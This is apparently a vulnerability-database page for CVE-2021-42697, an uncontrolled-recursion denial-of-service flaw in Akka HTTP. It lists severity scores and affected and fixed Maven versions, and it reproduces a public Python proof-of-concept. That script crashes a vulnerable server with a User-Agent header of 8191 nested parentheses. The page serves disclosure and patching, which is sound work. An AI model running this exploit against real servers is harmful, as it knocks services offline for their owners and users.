CVE-2021-42697

unknown

Published 2022-05-24 · Modified 2025-09-30

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Uncontrolled Recursion in Akka HTTP

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-50892 remote multiple python · 2 KB

cxosmo · 2022-05-11

Akka HTTP 10.1.14 - Denial of Service

python exploit Source: Exploit-DB

# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
# Date: 18/4/2022
# Exploit Author: cxosmo
# Vendor Homepage: https://akka.io
# Software Link: https://github.com/akka/akka-http
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
# Tested on: Akka HTTP 10.2.4, Ubuntu
# CVE : CVE-2021-42697

import argparse
import logging
import requests

# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()

def send_benign_request(url, verify=True):
    log.info(f"Sending benign request to {url} for checking reachability...")
    try:
        r = requests.get(url)
        log.info(f"Benign request returned following status code: {r.status_code}")
        return True
    except Exception as e:
        log.info(f"The following exception was encountered: {e}")
        return False

def send_malicious_request(url, verify=True):
    log.info(f"Sending malicious request to {url}")
    # Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
    nested_comment_payload = "("*8191
    headers = {'User-Agent': nested_comment_payload}
    try:
        r = requests.get(url, headers=headers)
        log.info(f"Request returned following status code: {r.status_code}")
    # Expected exception to be returned if server is DoSed successfully
    except requests.exceptions.RequestException as e:
        if "Remote end closed connection without response" in str(e):
            log.info(f"The server is unresponsive per {e}: DoS likely successful")
    except Exception as e:
        log.info(f"The following exception was encountered: {e}")

if __name__ == "__main__":
    # Parse command line
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
    required_arguments = parser.add_argument_group('required arguments')
    required_arguments.add_argument("-t", "--target",
                        help="Target URL for vulnerable Akka server (e.g. https://localhost)",
                        required="True", action="store")
    parser.add_argument("-k", "--insecure",
                        help="Disable verification of SSL/TLS certificate",
                        action="store_false", default=True)
    args = parser.parse_args()

    # Send requests: first is connectivity check, second is DoS attempt
    if send_benign_request(args.target, args.insecure):
        send_malicious_request(args.target, args.insecure)

Package impact

Ecosystem	Package	Vulnerable	Fixed
Maven	com.typesafe.akka:akka-http-core_2.13.0-RC3	`>=10.1.0`
Maven	com.typesafe.akka:akka-http-core_2.13.0-RC2	`>=10.1.0`
Maven	com.typesafe.akka:akka-http-core_2.13.0-M5	`>=10.1.0`
Maven	com.typesafe.akka:aakka-http-core_2.13.0-M3	`>=10.1.0`
Maven	com.typesafe.akka:akka-http-core_2.13	`>=10.1.0,<10.1.15`	`10.1.15`
Maven	com.typesafe.akka:akka-http-core_2.13	`>=10.2.0-M1,<10.2.7`	`10.2.7`
Maven	com.typesafe.akka:akka-http-core_2.12	`>=10.1.0,<10.1.15`	`10.1.15`
Maven	com.typesafe.akka:akka-http-core_2.12	`>=10.2.0-M1,<10.2.7`	`10.2.7`
Maven	com.typesafe.akka:akka-http-core_2.11	`>=10.1.0,<10.1.15`	`10.1.15`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.